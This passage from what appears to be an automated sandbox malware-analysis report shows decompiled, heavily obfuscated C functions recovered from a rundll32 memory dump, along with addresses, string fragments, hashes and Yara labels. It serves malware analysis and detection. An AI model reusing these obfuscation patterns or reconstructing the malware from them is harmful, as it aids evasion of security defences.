				_v624 = _v624 ^ 0xd586ca9a;
				_v596 = 0x23f3;
				_v596 = _v596 << 0x10;
				_t206 = _v576;
				_v596 = _v596 * 0x21;
				_v596 = _v596 ^ 0xa2536537;
				_v604 = 0xb869;
				_v604 = _v604 + 0x1500;
				_v604 = _v604 ^ 0xdf411415;
				_v604 = _v604 ^ 0xdf41df50;
				_v580 = 0x91ab;
				_v580 = _v580 | 0x75cd6eed;
				_v580 = _v580 ^ 0x75cdc157;
				_v584 = 0x41c3;
				_v584 = _v584 | 0x7a0b54b1;
				_v584 = _v584 + 0x22a4;
				_v584 = _v584 ^ 0x7a0b1750;
				_v588 = 0xc9d8;
				_v588 = _v588 << 6;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x000064ee;
				do {
					while(_t178 != 0x5ded331) {
						if(_t178 != 0xe6392eb) {
							if(_t178 == 0x26ceaef1) {
								return E0043F1ED(_v596, _v604, _v580, _v584, _t206);
							}
							if(_t178 == 0x294df979) {
								_t174 = E0044293E(_v572, _v616,  &_v556, _v592, _v624, _t206);
								_t209 =  &(_t209[4]);
								asm("sbb ecx, ecx");
								_t186 =  ~_t174 & 0x034cb45d;
								goto L9;
							} else {
								if(_t178 == 0x2a1b634e) {
									_t174 = _a8( &_v556, _t201);
									asm("sbb ecx, ecx");
									_t186 =  ~_t174 & 0x027f4a88;
									L9:
									_t178 = _t186 + 0x26ceaef1;
									continue;
								} else {
									if(_t178 != 0x32110b52) {
										goto L16;
									} else {
										_t178 = 0xe6392eb;
										continue;
									}
								}
							}
						}
						_t171 = E00442B68(_t178, _v588);
						_t206 = _t171;
						_t209 = _t209 - 0xc + 0x10;
						if(_t171 != 0xffffffff) {
							_t178 = 0x5ded331;
							continue;
						}
						return _t171;
						L20:
					}
					_v556 = 0x22c;
					if(E00441623( &_v556, _t206, _v608, _v612) == 0) {
						_t178 = 0x26ceaef1;
						goto L16;
					} else {
						_t178 = 0x2a1b634e;
						continue;
					}
					goto L20;
					L16:
				} while (_t178 != 0x281e4e2f);
				return _t174;
			}

0x00432de9
0x00432df0
0x00432df2
0x00432df9
0x00432dfa
0x00432dfb
0x00432e00
0x00432e05
0x00432e08
0x00432e12
0x00432e1a
0x00432e1f
0x00432e27
0x00432e2b
0x00432e33
0x00432e41
0x00432e46
0x00432e4c
0x00432e54
0x00432e5c
0x00432e64
0x00432e6c
0x00432e74
0x00432e79
0x00432e81
0x00432e89
0x00432e91
0x00432e99
0x00432e9e
0x00432ea6
0x00432eb2
0x00432eb7
0x00432ebd
0x00432ec5
0x00432ecd
0x00432eda
0x00432edd
0x00432ee1
0x00432ee9
0x00432ef1
0x00432ef9
0x00432f01
0x00432f06
0x00432f0e
0x00432f1b
0x00432f1f
0x00432f27
0x00432f2f
0x00432f37
0x00432f3f
0x00432f47
0x00432f4f
0x00432f57
0x00432f67
0x00432f6f
0x00432f72
0x00432f76
0x00432f7e
0x00432f86
0x00432f8e
0x00432fa2
0x00432fa6
0x00432faa
0x00432fb2
0x00432fba
0x00432fc2
0x00432fca
0x00432fd2
0x00432fda
0x00432fe2
0x00432fea
0x00432ff2
0x00432ffa
0x00433002
0x0043300a
0x00433012
0x00433017
0x0043301c
0x00433024
0x00433024
0x00433032
0x00433036
0x00000000
0x00433126
0x00433042
0x00433092
0x00433097
0x0043309e
0x004330a0
0x00000000
0x00433044
0x0043304a
0x00433065
0x00433070
0x00433072
0x00433078
0x00433078
0x00000000
0x0043304c
0x00433052
0x00000000
0x00433058
0x00433058
0x00000000
0x00433058
0x00433052
0x0043304a
0x00433042
0x004330bf
0x004330c4
0x004330c6
0x004330cc
0x004330ce
0x00000000
0x004330ce
0x00433133
0x00000000
0x00433133
0x004330db
0x004330f4
0x00433100
0x00000000
0x004330f6
0x004330f6
0x00000000
0x004330f6
0x00000000
0x00433102
0x00433102
0x00000000

Strings

d, xrefs: 0043301C
L, xrefs: 00432F06
VBp?, xrefs: 00432EF1
q5, xrefs: 00432EC5
:&, xrefs: 00432E1F

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :&$VBp?$q5$L$d
API String ID: 0-1357951408
Opcode ID: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
Instruction ID: 173f6dae2371ac47a80fcb1b05a5715f1d03e1befe1b05550c3aff59afdc5f86
Opcode Fuzzy Hash: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
Instruction Fuzzy Hash: FC8175715083419BD768CF25D88981FBBF1FBC8768F005A1EF596962A0C7788A49CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 00172353, Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

:&, xrefs: 00172393
L, xrefs: 0017247A
VBp?, xrefs: 00172465
q5, xrefs: 00172439
d, xrefs: 00172590

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :&$VBp?$q5$L$d
API String ID: 0-1357951408
Opcode ID: 9625934489e2dad54f0a0194016c640e6ad5100f496de32f8f15a457e04f42a4
Instruction ID: 2daf148f5f3fd1905c2a1e0953575b4f34e3fd342493521dd96b4c0a087a0efb
Opcode Fuzzy Hash: 9625934489e2dad54f0a0194016c640e6ad5100f496de32f8f15a457e04f42a4
Instruction Fuzzy Hash: BC8183B15083419BD398DE25C88985FBBF1FBC4768F008A1DF58A962A0D378CA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00449DBF, Relevance: 6.4, Strings: 5, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00449DBF() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t123;
				signed int _t126;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int _t135;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				signed int* _t158;

				_t158 =  &_v568;
				_v528 = 0x60d9f0;
				_t155 = 0;
				_t131 = 0x15228660;
				_v524 = 0;
				_v548 = 0xcd57;
				_t150 = 0x7d;
				_v548 = _v548 / _t150;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00004d7f;
				_v568 = 0x7da6;
				_v568 = _v568 ^ 0x9d4dffd0;
				_v568 = _v568 + 0x4fb1;
				_v568 = _v568 ^ 0x61a60d8b;
				_v568 = _v568 ^ 0xfceba89c;
				_v564 = 0xc0eb;
				_v564 = _v564 + 0xfffff60a;
				_v564 = _v564 + 0x7921;
				_v564 = _v564 | 0xce5d4b47;
				_v564 = _v564 ^ 0xce5d5527;
				_v560 = 0xb537;
				_v560 = _v560 ^ 0xfff7bf7c;
				_v560 = _v560 ^ 0xfff72356;
				_v552 = 0x7344;
				_t151 = 0x5d;
				_v552 = _v552 / _t151;
				_v552 = _v552 ^ 0x4bec447d;
				_v552 = _v552 ^ 0x4bec1377;
				_v532 = 0x249f;
				_v532 = _v532 | 0xc4145615;
				_v532 = _v532 ^ 0xc4142924;
				_v536 = 0x1806;
				_t152 = 0x57;
				_t157 = _v560;
				_t130 = _v560;
				_v536 = _v536 * 0x50;
				_v536 = _v536 ^ 0x00078d58;
				_v556 = 0x1833;
				_v556 = _v556 << 0xc;
				_v556 = _v556 + 0xffff5490;
				_v556 = _v556 ^ 0x0182d013;
				_v540 = 0x2b82;
				_v540 = _v540 / _t152;
				_v540 = _v540 ^ 0x00005334;
				_v544 = 0xc7f0;
				_t153 = 0x6c;
				_t154 = _v560;
				_v544 = _v544 / _t153;
				_v544 = _v544 ^ 0x00002c79;
				do {
					while(_t131 != 0x1f7477) {
						if(_t131 == 0x2a2b494) {
							_t123 = E0043A525(_v568, __eflags,  &_v520, _t154, _v564);
							_t158 =  &(_t158[3]);
							__eflags = _t123;
							if(__eflags == 0) {
								L18:
								return _t155;
							}
							_t131 = 0x1f7477;
							continue;
						}
						if(_t131 == 0x3351846) {
							_t126 = E00440CCD();
							_t154 = _t126;
							__eflags = _t126;
							if(__eflags == 0) {
								goto L18;
							}
							_t131 = 0x2a2b494;
							continue;
						}
						if(_t131 == 0x8686635) {
							_v568 = 0xbfc3;
							_t135 = 0x65;
							_v568 = _v568 / _t135;
							_v568 = _v568 | 0xe5cb59f9;
							_v568 = _v568 + 0xffffe272;
							_v568 = _v568 ^ 0xcfec3c93;
							__eflags = _t130 - _v568;
							if(_t130 == _v568) {
								_t155 = 1;
								__eflags = 1;
							}
							goto L18;
						}
						if(_t131 == 0x15228660) {
							_t131 = 0x3351846;
							continue;
						}
						if(_t131 != 0x2e9709f0) {
							goto L14;
						}
						_t129 = E0043165C(_t157, _v536, _v556, _v540, _v544);
						_t158 =  &(_t158[3]);
						_t130 = _t129;
						_t131 = 0x8686635;
					}
					_t157 = E0043BDCC( &_v520, _v560, _v552, _v532);
					_t131 = 0x2e9709f0;
					L14:
					__eflags = _t131 - 0x2a22e55c;
				} while (__eflags != 0);
				goto L18;
			}

0x00449dbf
0x00449dc5
0x00449dd5
0x00449dd7
0x00449ddc
0x00449de0
0x00449dec
0x00449df1
0x00449df7
0x00449dfc
0x00449e04
0x00449e0c
0x00449e14
0x00449e1c
0x00449e24
0x00449e2c
0x00449e34
0x00449e3c
0x00449e44
0x00449e4c
0x00449e54
0x00449e5c
0x00449e64
0x00449e6c
0x00449e78
0x00449e7d
0x00449e83
0x00449e8b
0x00449e93
0x00449e9b
0x00449ea3
0x00449eab
0x00449eb8
0x00449ebb
0x00449ebf
0x00449ec3
0x00449ec7
0x00449ecf
0x00449ed7
0x00449edc
0x00449ee4
0x00449eec
0x00449efc
0x00449f00
0x00449f08
0x00449f14
0x00449f17
0x00449f1b
0x00449f1f
0x00449f27
0x00449f27
0x00449f39
0x00449fb5
0x00449fba
0x00449fbd
0x00449fbf
0x0044a030
0x0044a03b
0x0044a03b
0x00449fc1
0x00000000
0x00449fc1
0x00449f41
0x00449f91
0x00449f96
0x00449f98
0x00449f9a
0x00000000
0x00000000
0x00449fa0
0x00000000
0x00449fa0
0x00449f49
0x00449ff7
0x0044a007
0x0044a00a
0x0044a00e
0x0044a016
0x0044a01e
0x0044a026
0x0044a02a
0x0044a02e
0x0044a02e
0x0044a02e
0x00000000
0x0044a02a
0x00449f55
0x00449f86
0x00000000
0x00449f86
0x00449f5d
0x00000000
0x00000000
0x00449f75
0x00449f7a
0x00449f7d
0x00449f7f
0x00449f7f
0x00449fe2
0x00449fe4
0x00449fe9
0x00449fe9
0x00449fe9
0x00000000

Strings

}DK, xrefs: 00449E83
4S, xrefs: 00449F00
!y, xrefs: 00449E3C
y,, xrefs: 00449F1F
\"*, xrefs: 00449FE9

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !y$4S$\"*$y,$}DK
API String ID: 0-1385372798
Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
Instruction ID: 6476345671b5751eb07edd83b9d8e4645c6ffe6744d8ab3aa75372c01076f64f
Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
Instruction Fuzzy Hash: 3F5197715083418BE358CE25C58992FFBE1FBC8758F140A1EF599962A0C779CA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 00189333, Relevance: 6.4, Strings: 5, Instructions: 145COMMON

Download Yara Rule

Strings

!y, xrefs: 001893B0
y,, xrefs: 00189493
\"*, xrefs: 0018955D
4S, xrefs: 00189474
}DK, xrefs: 001893F7

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !y$4S$\"*$y,$}DK
API String ID: 0-1385372798
Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
Instruction ID: 3757287926fcc3a8bc5af0504cd48dd3abe14db8e0ab456ce616f2e1a4dc01c7
Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
Instruction Fuzzy Hash: 5151987150C3418FD358DE24C58992FBBE1FBC8768F544A1EF58A96260C7B5CA0A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 00449B4A, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00449B4A(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t139;
				intOrPtr _t141;
				intOrPtr _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t173;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t176;

				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x24c8e6;
				_v12 = 0x512e7e;
				_v64 = 0xe6d4;
				_v64 = _v64 + 0xffffc62e;
				_v64 = _v64 ^ 0x62da4f4f;
				_v64 = _v64 + 0x4b4;
				_v64 = _v64 ^ 0x62daac72;
				_v36 = 0x1dac;
				_t151 = 0xc;
				_v36 = _v36 / _t151;
				_v36 = _v36 ^ 0x000026fb;
				_v60 = 0xf2ce;
				_v60 = _v60 + 0x7932;
				_t152 = 0x4d;
				_v60 = _v60 / _t152;
				_t153 = 0x3b;
				_v60 = _v60 * 0x21;
				_v60 = _v60 ^ 0x00008d5c;
				_v32 = 0x9fef;
				_v32 = _v32 ^ 0xbf11c352;
				_v32 = _v32 ^ 0xbf1108c7;
				_v40 = 0x93bf;
				_v40 = _v40 + 0xffffb4ac;
				_v40 = _v40 / _t153;
				_v40 = _v40 ^ 0x00007264;
				_v44 = 0x3ea3;
				_v44 = _v44 | 0x1bb7f55d;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x376fc359;
				_v24 = 0xe782;
				_v24 = _v24 + 0xffff9e28;
				_v24 = _v24 ^ 0x0000d291;
				_v28 = 0xff08;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x000057fc;
				_v48 = 0x3b3e;
				_v48 = _v48 << 9;
				_t154 = 0x19;
				_v48 = _v48 * 0x7b;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00e3c1df;
				_v20 = 0x1063;
				_v20 = _v20 + 0xffffa595;
				_v20 = _v20 ^ 0xffffc157;
				_v52 = 0xa2f2;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xffff5a4e;
				_v52 = _v52 + 0xb28b;
				_v52 = _v52 ^ 0x00000530;
				_v56 = 0x99a4;
				_v56 = _v56 / _t154;
				_v56 = _v56 + 0xfffff33a;
				_v56 = _v56 + 0xffffe1ed;
				_v56 = _v56 ^ 0xfffff62c;
				_t139 = E00441999();
				_t173 = _a4;
				_t175 = _t139;
				_v64 = 0x5a09;
				_v64 = _v64 + 0x27ad;
				_v64 = _v64 + 0xa7ad;
				_v64 = _v64 ^ 0x00012963;
				_t177 = _t173 + 0x24;
				_t150 = E0043165C(_t173 + 0x24, _v60, _v32, _v40, _v44);
				_t141 =  *((intOrPtr*)(_t173 + 8));
				if(_t141 != _v64 && _t141 != _t175) {
					_t156 =  *((intOrPtr*)(_t173 + 0x18));
					if(_t156 != _v64 && _t156 != _t175) {
						_t174 = _a8;
						_t157 =  *_t174;
						if(E0043E9C1(_t157, _t150) == 0) {
							_push(_t157);
							_t176 = E004354FB(0x224);
							if(_t176 != 0) {
								_t121 = _t176 + 0x1c; // 0x1c
								E004403F1(_v48, _v20, _t177, _t121, _v52, _v56);
								 *((intOrPtr*)(_t176 + 0x10)) = _t150;
								 *((intOrPtr*)(_t176 + 8)) =  *_t174;
								 *_t174 = _t176;
							}
						}
					}
				}
				return 1;
			}

0x00449b4d
0x00449b54
0x00449b59
0x00449b61
0x00449b69
0x00449b70
0x00449b77
0x00449b7e
0x00449b85
0x00449b8c
0x00449b9e
0x00449ba3
0x00449ba9
0x00449bb1
0x00449bb9
0x00449bc5
0x00449bca
0x00449bd5
0x00449bd8
0x00449bdc
0x00449be4
0x00449bec
0x00449bf4
0x00449bfc
0x00449c04
0x00449c14
0x00449c18
0x00449c20
0x00449c28
0x00449c30
0x00449c34
0x00449c3c
0x00449c44
0x00449c4c
0x00449c54
0x00449c5c
0x00449c61
0x00449c69
0x00449c71
0x00449c7b
0x00449c7c
0x00449c80
0x00449c85
0x00449c8d
0x00449c95
0x00449c9d
0x00449ca5
0x00449cad
0x00449cb2
0x00449cba
0x00449cc2
0x00449cca
0x00449cd8
0x00449cdc
0x00449ce4
0x00449cec
0x00449cfc
0x00449d01
0x00449d05
0x00449d07
0x00449d0f
0x00449d17
0x00449d1f
0x00449d27
0x00449d41
0x00449d46
0x00449d4d
0x00449d53
0x00449d5a
0x00449d60
0x00449d66
0x00449d6f
0x00449d7e
0x00449d84
0x00449d89
0x00449d8f
0x00449da0
0x00449da5
0x00449dad
0x00449db0
0x00449db0
0x00449d89
0x00449d6f
0x00449d5a
0x00449dbc

Strings

dr, xrefs: 00449C18
Z, xrefs: 00449D07
~.Q, xrefs: 00449B61
>;, xrefs: 00449C69
2y, xrefs: 00449BB9

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Z$2y$>;$dr$~.Q
API String ID: 0-1863639504
Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
Instruction ID: 97be79afbbbd9aa300bd68e31ee37c97afea311d2b99104df491fde63839aec6
Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
Instruction Fuzzy Hash: D86111B25083429FE384DF25C48951BBBE1BBE4358F105A1DF0D5962A0D3B8DA99CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001890BE, Relevance: 6.4, Strings: 5, Instructions: 143COMMON

Download Yara Rule

Strings

dr, xrefs: 0018918C
2y, xrefs: 0018912D
>;, xrefs: 001891DD
~.Q, xrefs: 001890D5
Z, xrefs: 0018927B

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Z$2y$>;$dr$~.Q
API String ID: 0-1863639504
Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
Instruction ID: ba93d0aa78873c66b838981355708680d066b5e6387fb75dd8d1e7109e966ee6
Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
Instruction Fuzzy Hash: 646111715083429FD384DF25C48941BBBF1BBE4358F509A1DF4D9962A0D3B8DA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0043BB96, Relevance: 6.4, Strings: 5, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0043BB96(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t106;
				void* _t118;
				void* _t123;
				void* _t125;
				intOrPtr _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				void* _t148;

				_push(_a8);
				_t141 = _a4;
				_t123 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t106);
				_v80 = 0x2da5ed;
				_t148 = _t147 + 0x10;
				_t142 = 0;
				_v76 = 0;
				_t125 = 0x345de67e;
				_v72 = 0;
				_v100 = 0x5d99;
				_t143 = 9;
				_v100 = _v100 / _t143;
				_v100 = _v100 + 0x3ccb;
				_v100 = _v100 ^ 0x0000340e;
				_v84 = 0xb7f0;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0x00004e6b;
				_v104 = 0x2472;
				_v104 = _v104 << 0xb;
				_v104 = _v104 | 0x2ee3a515;
				_v104 = _v104 ^ 0x2fe3eebe;
				_v108 = 0xd2e1;
				_v108 = _v108 + 0xffff0d62;
				_t144 = 0x14;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x0cccdcb2;
				_v112 = 0x5926;
				_v112 = _v112 + 0xdeb5;
				_v112 = _v112 << 6;
				_v112 = _v112 << 0xc;
				_v112 = _v112 ^ 0xdf6c425e;
				_v96 = 0x379b;
				_v96 = _v96 << 1;
				_t145 = 0x6d;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x001e434e;
				_v116 = 0x863a;
				_v116 = _v116 * 0x52;
				_v116 = _v116 + 0xffff0085;
				_v116 = _v116 + 0x7cb6;
				_v116 = _v116 ^ 0x002a75a4;
				_v120 = 0x5588;
				_v120 = _v120 / _t145;
				_v120 = _v120 << 1;
				_v120 = _v120 << 3;
				_v120 = _v120 ^ 0x00002108;
				_v88 = 0xce65;
				_v88 = _v88 ^ 0x25948ee5;
				_v88 = _v88 * 0x2e;
				_v88 = _v88 ^ 0xc0a3e1fe;
				_v92 = 0x75c8;
				_v92 = _v92 + 0x1df4;
				_v92 = _v92 + 0xffff92c4;
				_v92 = _v92 ^ 0x00004c1f;
				do {
					while(_t125 != 0x128fa6f3) {
						if(_t125 == 0x1c314bcc) {
							E0043FEE3(_t123,  &_v68, _v100, _v84, _v104, _v108);
							_t148 = _t148 + 0x10;
							_t125 = 0x128fa6f3;
							continue;
						} else {
							if(_t125 == 0x1efca616) {
								__eflags = E0043BAA2( &_v68, _v88, _v92, _t141 + 8);
								_t142 =  !=  ? 1 : _t142;
							} else {
								if(_t125 != 0x345de67e) {
									goto L10;
								} else {
									_t125 = 0x1c314bcc;
									continue;
								}
							}
						}
						L13:
						return _t142;
					}
					_t118 = E0043F914(_v112, _v96, __eflags, _v116, _t141, _v120,  &_v68);
					_t148 = _t148 + 0x10;
					__eflags = _t118;
					if(__eflags == 0) {
						_t125 = 0xd121e29;
						goto L10;
					} else {
						_t125 = 0x1efca616;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t125 - 0xd121e29;
				} while (__eflags != 0);
				goto L13;
			}

0x0043bb9d
0x0043bba4
0x0043bbab
0x0043bbad
0x0043bbae
0x0043bbaf
0x0043bbb0
0x0043bbb5
0x0043bbbd
0x0043bbc0
0x0043bbc4
0x0043bbc8
0x0043bbcd
0x0043bbd1
0x0043bbdf
0x0043bbe4
0x0043bbea
0x0043bbf2
0x0043bbfa
0x0043bc02
0x0043bc07
0x0043bc0f
0x0043bc17
0x0043bc1c
0x0043bc24
0x0043bc2c
0x0043bc34
0x0043bc40
0x0043bc45
0x0043bc4b
0x0043bc53
0x0043bc5b
0x0043bc63
0x0043bc68
0x0043bc6d
0x0043bc75
0x0043bc7d
0x0043bc86
0x0043bc87
0x0043bc8b
0x0043bc93
0x0043bca0
0x0043bca4
0x0043bcac
0x0043bcb4
0x0043bcbc
0x0043bccf
0x0043bcd3
0x0043bcd7
0x0043bcdc
0x0043bce4
0x0043bcec
0x0043bcf9
0x0043bcfd
0x0043bd05
0x0043bd0d
0x0043bd15
0x0043bd1d
0x0043bd25
0x0043bd25
0x0043bd2f
0x0043bd5b
0x0043bd60
0x0043bd63
0x00000000
0x0043bd31
0x0043bd37
0x0043bdbd
0x0043bdbf
0x0043bd39
0x0043bd3f
0x00000000
0x0043bd41
0x0043bd41
0x00000000
0x0043bd41
0x0043bd3f
0x0043bd37
0x0043bdc3
0x0043bdcb
0x0043bdcb
0x0043bd80
0x0043bd85
0x0043bd88
0x0043bd8a
0x0043bd93
0x00000000
0x0043bd8c
0x0043bd8c
0x00000000
0x0043bd8c
0x00000000
0x0043bd98
0x0043bd98
0x0043bd98
0x00000000

Strings

~]4, xrefs: 0043BD39
r$, xrefs: 0043BC0F
~]4, xrefs: 0043BBC8
&Y, xrefs: 0043BC53
kN, xrefs: 0043BC07

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &Y$kN$r$$~]4$~]4
API String ID: 0-4213572440
Opcode ID: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
Instruction ID: 866b77ddd61dcc219a38e77f1fc741eaae482b8394e7c4316b1bb4757ed687f6
Opcode Fuzzy Hash: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
Instruction Fuzzy Hash: 06517771508300AFE354CF21C88992FBBE1FBC8B58F405A1EF58556260D3B9CA49CB87

Uniqueness

Uniqueness Score: -1.00%

Function 0017B10A, Relevance: 6.4, Strings: 5, Instructions: 134COMMON

Download Yara Rule

Strings

~]4, xrefs: 0017B13C
kN, xrefs: 0017B17B
~]4, xrefs: 0017B2AD
&Y, xrefs: 0017B1C7
r$, xrefs: 0017B183

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &Y$kN$r$$~]4$~]4
API String ID: 0-4213572440
Opcode ID: 241dbdd6d2babb46e9ee13cc0325bded3d4adcccd0ed996a5176e7e6602560ba
Instruction ID: 5ec504e41f4c8000db3f4cb4de8b777dcf8a5b1a2294616d7c0459b2a2e0a108
Opcode Fuzzy Hash: 241dbdd6d2babb46e9ee13cc0325bded3d4adcccd0ed996a5176e7e6602560ba
Instruction Fuzzy Hash: 555153715093009FE358CF21C88992FBBF5FBD4B58F504A1EF589662A1C3B5DA49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00441F88, Relevance: 6.4, Strings: 5, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00441F88() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				char* _t108;
				void* _t113;
				signed int _t116;
				signed int _t127;
				short* _t128;
				signed int* _t131;

				_t131 =  &_v560;
				_v532 = 0xdf77;
				_v532 = _v532 | 0xf1b1db65;
				_t113 = 0x2283ac23;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x03c6ff13;
				_v544 = 0xdd97;
				_v544 = _v544 >> 0xb;
				_v544 = _v544 ^ 0x7831024e;
				_v544 = _v544 ^ 0x78315e83;
				_v536 = 0xeb3d;
				_v536 = _v536 << 4;
				_v536 = _v536 ^ 0x56aecc65;
				_v536 = _v536 ^ 0x56a04d5b;
				_v524 = 0x8c08;
				_v524 = _v524 | 0x5902e3b1;
				_v524 = _v524 ^ 0x5902aa3b;
				_v552 = 0xfdc1;
				_v552 = _v552 * 0x29;
				_t127 = 0x1d;
				_v552 = _v552 * 0x66;
				_v552 = _v552 / _t127;
				_v552 = _v552 ^ 0x008eebdb;
				_v556 = 0x4ae2;
				_v556 = _v556 + 0xffff2c78;
				_v556 = _v556 + 0xdee6;
				_v556 = _v556 >> 0x10;
				_v556 = _v556 ^ 0x000006e5;
				_v528 = 0xfda8;
				_v528 = _v528 << 0xf;
				_v528 = _v528 ^ 0x7ed4787e;
				_v540 = 0xbfac;
				_v540 = _v540 >> 7;
				_t128 = _v528;
				_v540 = _v540 * 0x19;
				_v540 = _v540 ^ 0x00004b65;
				_v560 = 0xd500;
				_v560 = _v560 * 0x6a;
				_v560 = _v560 >> 3;
				_v560 = _v560 + 0x9ecd;
				_v560 = _v560 ^ 0x000bcd88;
				L1:
				while(_t113 != 0xb1bd1f2) {
					if(_t113 == 0x109d50bf) {
						_push(_t113);
